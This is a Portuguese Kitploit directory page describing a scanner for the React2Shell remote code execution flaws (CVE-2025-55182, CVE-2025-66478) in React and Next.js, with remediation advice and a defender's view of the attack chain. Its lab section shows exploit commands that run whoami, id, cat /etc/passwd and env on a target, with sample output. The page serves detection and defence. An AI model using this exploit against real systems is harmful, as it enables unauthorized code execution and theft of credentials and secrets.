Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478 — Scanner para CVE-2025-55182 (React) e CVE-2025-66478 (Next.js) - Rastreie e remedeie uma campanha de vulnerabilidade crítica de React Server Components (RSC) / protocolo Flight que afeta react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack e frameworks com suporte a RSC, como Next.js. | Kitploit
Ferramentas/GitHubGitHub/security-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebAnálise de CódigoExploraçãoSegurança WebTestes de PenetraçãoSegurança da Cadeia de SuprimentosAprendizado e EducaçãoLabs e Prática
GitHubsecurity-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478

react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

Ver Repositório
6311há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Scanner para CVE-2025-55182 (React) e CVE-2025-66478 (Next.js) - Rastreie e remedeie uma campanha de vulnerabilidade crítica de React Server Components (RSC) / protocolo Flight que afeta react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack e frameworks com suporte a RSC, como Next.js.

Compartilhar

🔍 Phoenix SCA Scanner - Universal - Versão para Vulnerabilidade CVE-2025-55182-CVE-2025-66478 React e Nexus

Vulnerabilidade EXTERNA para a classe de bugs React2Shell: duas vulnerabilidades de execução remota de código não autenticadas recém-divulgadas no protocolo "Flight" dos React Server Components (RSC)—CVE-2025-55182 (React) e CVE-2025-66478 (Next.js), ambas classificadas como CVSS 10.0. Esses problemas residem na forma como os endpoints RSC/Server Function decodificam payloads Flight controlados pelo atacante, transformando uma única requisição HTTP manipulada em potencial execução de código no servidor—mesmo em stacks modernas "padrão" de React/Next.js que usam App Router e builds de produção. Para muitas equipes, este é um momento de "corrigir agora, verificar exposição e depois auditar", e não algo para adiar para um sprint posterior de higiene de dependências. A pasta LAB contém exploits e vulnerabilidades de laboratório para React2Shell

Este projeto oferece uma abordagem dupla: (1) varredura de risco de composição de software / dependências (esta ferramenta), para localizar rapidamente bibliotecas e versões vulneráveis, e (2) um scanner web DAST (React2Shell Web Scanner) que testa ativamente endpoints RSC/Flight a partir do exterior, validando se caminhos exploráveis estão acessíveis em ambientes em execução. Juntas, elas ajudam você a responder tanto "onde estão os componentes vulneráveis?" quanto "onde eles podem realmente ser explorados em produção?" para que você possa priorizar correções, hardening e resposta a incidentes com confiança.


🌐 Web Scanner - Detecção de RCE React2Shell

Para testes de endpoint ao vivo e validação de RCE, consulte o scanner web dedicado:

📁 web-scan_CVE-2025-66478/ - Documentação completa e guia

Início Rápido - Web Scanner

cd web-scan_CVE-2025-66478

# Install dependencies
pip install -r requirements.txt

# Scan a single target
python3 react2shell-scanner -u https://target.com -v

# Scan with evidence display
python3 react2shell-scanner -u https://target.com --show-evidence

# Batch scan with all export formats
python3 react2shell-scanner -l targets.txt -o results.json --csv results.csv --html report.html

# Test the exploit on vulnerable target (requires Python 3.11+)
python3.11 test-lab/exploit.py -u http://vulnerable-host:3000 -c "hostname"

Recursos do Web Scanner

FeatureDescrição
🔍 Detecção de RCEDetecção segura baseada em aritmética (sem efeitos colaterais)
🎯 Fingerprinting de TecnologiaDetecção automática de aplicações Next.js/React
📊 Exportação Multi-FormatoRelatórios JSON, CSV, HTML
🔗 Correlação de IOCsCorrespondência com 31+ IPs maliciosos conhecidos
🌐 Varredura em EscalaFaixas CIDR, enumeração de subdomínios
☁️ Integração PhoenixEnvio de descobertas para o Phoenix Security
💻 Ferramenta de ExploitExecuta comandos em alvos vulneráveis

Configuração do Laboratório de Teste

cd web-scan_CVE-2025-66478/test-lab/lab

# Start vulnerable (3011) and patched (3012) instances
docker-compose up -d

# Test vulnerable instance
python3 react2shell-scanner -u http://localhost:3011 --show-evidence

Exemplos de Exploit (requer Python 3.11+)

cd web-scan_CVE-2025-66478/test-lab

# Install exploit dependencies
pip3.11 install -r requirements.txt

# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"  
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env"

# Application recon
python3.11 exploit.py -u http://localhost:3011 -c "pwd"           # /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

🛡 React2Shell / RCE no Protocolo Flight – Visão Geral da Vulnerabilidade

React2Shell é uma primitiva de execução remota de código não autenticada contra o tratamento de payloads dos React Server Components (RSC) no protocolo Flight. Na prática, isso significa que um cliente malicioso pode enviar uma única requisição HTTP manipulada a um endpoint RSC/Server Function e, se uma versão vulnerável estiver em uso, potencialmente transformar um "aplicativo web" em um "shell de servidor".

Em um nível geral:

  • Payloads Flight controlados pelo atacante são enviados a endpoints envolvidos no tratamento de RSC / Server Functions (por exemplo, em implantações Next.js com App Router).
  • O servidor usa a lógica de decodificação e desserialização Flight do React para transformar esse payload novamente em dados e instruções no lado do servidor.
  • A desserialização insegura nessa camada permite que um atacante influencie a execução no lado do servidor, escalando para execução remota de código (RCE) completa.

Como se trata de RCE não autenticada, configurações padrão de produção estão no escopo—mesmo que você nunca tenha escrito explicitamente uma "server function" e simplesmente adotado padrões modernos de React/Next.js. Mitigações no nível de hospedagem e WAFs genéricos não devem ser tratados como sua principal rede de segurança: eles podem reduzir a exposição, mas não compensarão de forma confiável bibliotecas vulneráveis. Trate isso como um incidente:

  • Corrija os pacotes DOM do servidor React RSC e o Next.js para as versões corrigidas.
  • Verifique a exposição varrendo codebases e SBOMs em busca das versões vulneráveis.
  • Audite os logs em busca de requisições suspeitas a endpoints relacionados a RSC/Flight e rotacione segredos se você suspeitar de comprometimento.

Uma vez que um atacante obtém RCE via React2Shell, os defensores devem assumir uma kill chain familiar:

  • Descoberta de ambiente – enumerar runtime, estrutura do sistema de arquivos, variáveis de ambiente e endpoints de metadados da nuvem.
  • Caça a segredos – coletar arquivos .env, segredos de implantação, tokens de CI, credenciais de serviços e chaves de assinatura.
  • Persistência – implantar artefatos semelhantes a webshells, modificar código no lado do servidor ou inserir tarefas agendadas quando possível.
  • Movimento lateral – pivotar para serviços internos, bancos de dados, filas e APIs de gerenciamento de nuvem.
  • Ação subsequente na cadeia de suprimentos – se credenciais de build ou deploy estiverem presentes, mover "rio acima" para CI/CD e registros de artefatos.

Se o seu pipeline de DevSecOps historicamente tratou a camada web como "apenas um frontend", esta vulnerabilidade é uma demonstração concreta de que frameworks frontend podem carregar um profundo raio de impacto no lado do servidor quando RSC e semânticas de streaming estão envolvidas. O Universal Vulnerability Scanner existe para ajudar você a responder rapidamente "estamos executando os pacotes vulneráveis em algum lugar?" e a alimentar essa resposta em campanhas orientadas pelo Phoenix e, em breve, na validação web DAST complementar de endpoints RSC ao vivo.

🎯 Recursos

Baixar ferramenta